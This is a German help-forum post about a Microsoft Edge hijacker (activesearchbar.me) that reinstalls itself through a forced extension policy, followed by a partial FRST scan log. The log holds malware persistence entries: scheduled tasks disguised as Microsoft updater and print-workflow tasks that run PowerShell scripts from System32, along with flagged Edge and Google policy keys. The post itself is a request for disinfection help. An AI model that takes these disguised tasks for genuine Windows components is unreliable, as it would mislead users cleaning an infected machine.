|
Log-Analyse und Auswertung: Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker ErweiterungWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
20.06.2022, 09:21 | #1 |
| Windows 11 Pro: Policy in Edge Browser nicht deaktivierbar, lädt activeserachbar.me Hijacker Erweiterung Hallo zusammen, auf dem Computer meines Sohnes, haben wir uns scheinbar einen Browser Hijacker, eingefangen: Symptome: 1. Edge Browser Richtlinie (edge://policy) ExtensionInstallForceList aktiviert sich immer wieder - screenshot "edge_policy_I.jpg" 2. Edge Erweiterung "activesearchbar.me" installiert sich selbständig und ist nicht deaktivier- oder löschbar Bisherige ergebnislose Lösungsversuche: 1. Scans mit Windows Defender 2. Scans mit Malwarebytes Anti-Malware & adwcleaner 3. Scans mit Spybot Search & Destroy Beobachtungen: 1. "activeserachbar.me" Erweiterung schreibt sich in der Registry in: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist 2. Löschung des D-Word Keys wirkt nur temporär, fügt sich selbständig wieder hinzu. 3. Löschung des gesamten Keys inkl. "ExtensionInstallforceList" wirkt zumindest soweit, dass die Meldung im Edge Browser "Von Ihrer Organisation verwaltet" für einige Zeit (Zeitraum nicht gemessen, ggf. ca 1h oder wenig) verschwindet. Danach taucht wieder "Von Ihrer Organisation verwaltet" auf - siehe Screenshot im Anhang. Weitere (temporäre) Maßnahmen: 1. Aktivierung GP Objekte Richtlinien für lokale Computer -> Computerkonfiguration -> Administrative Vorlagen -> Windows Komponenten -> Microsoft Edge: - Entwicklungstools zulassen (deaktiviert) - Erweiterungen zulassen (deaktiviert) - Querladen der Erweiterung zulassen (deaktiviert) Richtlinien für lokale Computer -> Benutzerkonfiguration -> Administrative Vorlagen -> Windows Komponenten -> Microsoft Edge: - Erweiterungen zulassen (deaktiviert) - Querladen der Erweiterung zulassen (deaktiviert) Die Richtlinien scheinen nicht zu funktionieren, da ich über "Erweiterungen" im Browser, immernoch manuell hinzufügen kann. Dennoch scheint sich seitdem diese "activesearchbar.me" nicht mehr automatisch hinzuzufügen, kann jedoch Zufall sein. Die "ApplicationInstallForceList" Policy aktiviert sich weiterhin immer wieder... Rahmenbedingungen: - Windows 11 Build 10.0.22000 Build 22000 - Aktuelles Patchlevel - Windows Defender aktiv, aktuell und nach Beschreibung im Trojaner-Board, eingestellt - Kein Defender Application Guard (Service nicht installiert) - Salfeld Kindersicherung aktiv (ausschließlich für Website Blacklisting) FRST Log: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 19-06-2022 durchgeführt von Pauli (Administrator) auf PAULS_GAMING_PC (ASUS System Product Name) (20-06-2022 09:41:25) Gestartet von C:\Users\Pauli\Desktop Geladene Profile: Pauli Plattform: Microsoft Windows 11 Pro Version 21H2 22000.739 (X64) Sprache: Deutsch (Deutschland) Standard-Browser: Edge Start-Modus: Normal ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe ->) (ASUSTeK COMPUTER INC. -> ) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\SwAgent\ArmourySwAgent.exe (C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmouryWebBrowserEdge.exe <4> (C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2> (C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> (C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.UserSessionHelper.exe (C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.CpuIdRemote64.exe (C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.DisplayAdapter.exe (C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Plugins\Cef\Lively.PlayerCefSharp.exe (C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Plugins\Watchdog\Lively.Watchdog.exe (C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Plugins\Cef\Lively.PlayerCefSharp.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Plugins\Cef\CefSharp.BrowserSubprocess.exe <4> (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE.exe (explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <13> (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\101.0.1210.39\msedgewebview2.exe <9> (explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe (Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (Salfeld Computer GmbH -> Salfeld Computer GmbH) C:\ProgramData\NFS\v3\NFSccsvc.exe (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\CtlSysUI.exe (services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe (services.exe ->) (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe (services.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\2.01.13\AsusFanControlService.exe (services.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) C:\Program Files (x86)\LightingService\LightingService.exe (services.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe (services.exe ->) (ASUSTEK COMPUTER INCORPORATION -> ASUS Inc.) C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair Memory, Inc.) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe (services.exe ->) (Corsair Memory, Inc. -> Corsair) C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUEDevicePluginHost.exe <8> (services.exe ->) (DTS, Inc. -> DTS Inc.) C:\Windows\System32\DTS\PC\APO4x\DtsApo4Service.exe (services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe (services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iastorvd.inf_amd64_fb9e356192ae1106\RstMwService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_d8d8130c2588d45b\OneApp.IGCC.WinService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe (services.exe ->) (Intel Corporation -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\piecomponent.inf_amd64_0570478011758f12\Intel_PIE_Service.exe (services.exe ->) (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe (services.exe ->) (Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe (services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\gamingservices.exe (services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.66.2001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe (services.exe ->) (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) C:\Windows\System32\CorsairGamingAudioCfgService64.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_fdd83e4dd87bcfa1\RtkAudUService64.exe <2> (services.exe ->) (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\ctlsysmgr.exe (services.exe ->) (Salfeld Computer GmbH -> Salfeld Computer) C:\Windows\cc\winctlsvc.exe (services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe (sihost.exe ->) (rocksdanister) C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.117.0_x86__97hta09mmv6hy\Build\Lively.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x64.exe <2> (svchost.exe ->) (ASUSTeK Computer Inc. -> ) C:\Program Files\ASUS\KINGSTON_Aac_DRAM\AacKingstonDramHal_x86.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTek Compputer Inc.) C:\Program Files\ASUS\AacMB\Aac3572MbHal_x64.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTek Compputer Inc.) C:\Program Files\ASUS\AacMB\Aac3572MbHal_x86.exe <2> (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe <6> (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\AacExtCard\extensionCardHal_x64.exe (svchost.exe ->) (ASUSTeK COMPUTER INC. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\AacExtCard\extensionCardHal_x86.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x64.exe (svchost.exe ->) (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS_Aac_DRAM\Aac3572DramHal_x86.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.722.5052.0_x64__8wekyb3d8bbwe\GameBar.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.722.5052.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe ==================== Registry (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_fdd83e4dd87bcfa1\RtkAudUService64.exe [1376856 2021-10-21] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [CORSAIR iCUE 4 Software] => C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUE Launcher.exe [182888 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32653776 2022-06-18] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-1424437550-2087844553-323541659-1001\...\Run: [MicrosoftEdgeAutoLaunch_0394F9F0D5AFEC0304440CFD4BF5F89C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3547048 2022-05-05] (Microsoft Corporation -> Microsoft Corporation) BootExecute: autocheck autochk * sdnclean64.exe GroupPolicy: Beschränkung - Edge <==== ACHTUNG GroupPolicy\User: Beschränkung - Edge <==== ACHTUNG GroupPolicyUsers\S-1-5-21-1424437550-2087844553-323541659-1001\User: Beschränkung <==== ACHTUNG Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============ (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {00147E1F-6094-4EA1-972B-427D1A2F6DA1} - System32\Tasks\ASUS\ArmourySocketServer => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe [2196448 2022-01-24] (ASUSTeK COMPUTER INC. -> ASUS) Task: {07595C2E-60C1-4CAA-90B7-43A07800F8DF} - System32\Tasks\Opera scheduled Autoupdate 1652464033 => C:\Users\Pauli\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Keine Datei) Task: {08172D97-5B78-454D-90F5-D1E547241197} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (Keine Datei) Task: {230BDA8E-A467-4040-8078-DAE5117CABC8} - System32\Tasks\MicrosoftPrintWorkflowService_2 => powershell -File C:/Windows/System32/PrintWorkflowService.ps1 Task: {45642FF6-3619-47AF-9980-EB2BDDD2D870} - System32\Tasks\MicrosoftPrintWorkflowService => powershell -File C:/Windows/System32/PrintWorkflowService.ps1 Task: {47F77BB5-8DA2-4E86-83BD-DF4045E80C30} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {4AD1AD68-0494-4673-8E95-51875726705A} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {4B320BD7-01F2-4F12-882D-6124BD7F45AF} - System32\Tasks\ASUS\NoiseCancelingEngine => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\MBLedSDK\NoiseCancelingEngine.exe [1241960 2021-11-24] (ASUSTeK Computer Inc. -> ASUS) Task: {5B8095A6-0C1E-4D17-A6BB-1C5756AAB167} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineCore => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c (Keine Datei) Task: {5E67C348-32A2-4F6B-8445-AADDCD518B82} - System32\Tasks\MicrosoftEdgeShadowStackRollbackTask => C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.39\Installer\setup.exe [3206048 2022-05-08] (Microsoft Corporation -> Microsoft Corporation) Task: {6F5AFCD5-F325-406B-8963-D0E7AA36B741} - System32\Tasks\Opera scheduled assistant Autoupdate 1652464039 => C:\Users\Pauli\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Pauli\AppData\Local\Programs\Opera\assistant" $(Arg0) Task: {701147DD-9D64-4887-A971-170DF64FED01} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {737CA134-BE9D-4DD1-80A3-888B8225C1EA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {822F3FA1-B1B0-4A53-8CA5-2F69C2230A19} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {85CD0405-93B5-4BBD-B6B7-53C1EDBD6EE8} - System32\Tasks\Microsoft\Windows\Clip\LicenseImdsIntegration => C:\Windows\system32\fclip.exe [480720 2022-06-17] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {86969224-86CB-43A9-BA0B-076322AF9A33} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {906980F4-8A9F-4D28-A235-263827E4E846} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {91AC97F0-4E7D-43EE-B738-817FF73D2F6D} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {9D2DAC32-0427-44D9-AE6A-8936C79D5A3D} - System32\Tasks\ASUS\AcPowerNotification => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe [294880 2022-01-24] (ASUSTeK COMPUTER INC. -> ASUS) Task: {A1411766-E2FC-47B4-9195-5EFB2B3C1F58} - System32\Tasks\MicrosoftEdgeUpdateTaskMachineUA => C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /ua /installsource scheduler (Keine Datei) Task: {AB8BF43F-3023-49DD-97A4-9F29C36D1CE5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {B3B430B3-2568-4730-AEEA-B1052DB2522F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {B3EB67F7-C7BB-4F3D-8D5F-D4A6EEEEE750} - System32\Tasks\MicrosoftWindowsUpdaterTask_PR1_2 => powershell -File C:/Windows/System32/WindowsUpdater1.ps1 Task: {BA3ED9CB-81C6-414E-958A-B3E7AA529CA8} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {CC0A7A45-1E31-4823-951C-BE34A4B6753F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {D1529CF3-305B-4714-AD86-332CDEB88597} - System32\Tasks\ASUS\Framework Service => C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe [43022856 2022-01-11] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) Task: {DB575289-EE17-4F83-A5D1-325A884A25F8} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {DC0B7859-04E0-4352-A99B-0907AB0EF465} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) Task: {DD76535E-14DA-47AA-8E46-34A19F073241} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore1d84b6ef7c35684 => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) Task: {ECB4171C-2617-409F-9B15-78C553295691} - System32\Tasks\MicrosoftWindowsUpdaterTask_PR1 => powershell -File C:/Windows/System32/WindowsUpdater1.ps1 (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{89b7fff4-68ae-400c-b01c-cce359d50f18}: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{a99b7a34-7b15-42d4-b39d-6c218b5a2543}: [DhcpNameServer] 192.168.1.254 Edge: ======= Edge DefaultProfile: Profile 1 Edge Profile: C:\Users\Pauli\AppData\Local\Microsoft\Edge\User Data\Default [2022-06-19] Edge Profile: C:\Users\Pauli\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2022-06-20] Edge StartupUrls: Profile 1 -> "hxxp://www.google.de/" Opera: ======= OPR Profile: C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable [2022-05-13] OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding} OPR Extension: (Rich Hints Agent) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2022-05-13] OPR Extension: (Opera Crypto Wallet) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2022-05-13] OPR Extension: (Amazon Assistant Promotion) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2022-05-13] ==================== Dienste (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 ArmouryCrateService; C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe [372456 2022-05-13] (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) S3 ArmouryLiveUpdate; C:\Windows\System32\DriverStore\FileRepository\rogms.inf_amd64_50ecaa1d662a0a48\ArmouryLiveUpdate.exe [576216 2022-01-12] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe [457544 2022-02-10] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) R2 AsusCertService; C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe [181576 2022-03-09] (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.) R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\2.01.13\AsusFanControlService.exe [2216264 2022-03-09] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [1164992 2022-06-19] (ASUSTeK Computer Inc. -> ) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> ) R2 CC-Updater; C:\Windows\cc\WinCtlSvc.exe [7518088 2022-05-24] (Salfeld Computer GmbH -> Salfeld Computer) R2 CorsairGamingAudioConfig; C:\Windows\System32\CorsairGamingAudioCfgService64.exe [661016 2022-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R2 CorsairLLAService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe [230504 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) R2 CorsairService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe [81512 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) R2 DtsApo4Service; C:\Windows\System32\DTS\PC\APO4x\DtsApo4Service.exe [224680 2021-09-22] (DTS, Inc. -> DTS Inc.) R2 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [10932944 2022-06-14] (Electronic Arts, Inc. -> Electronic Arts) 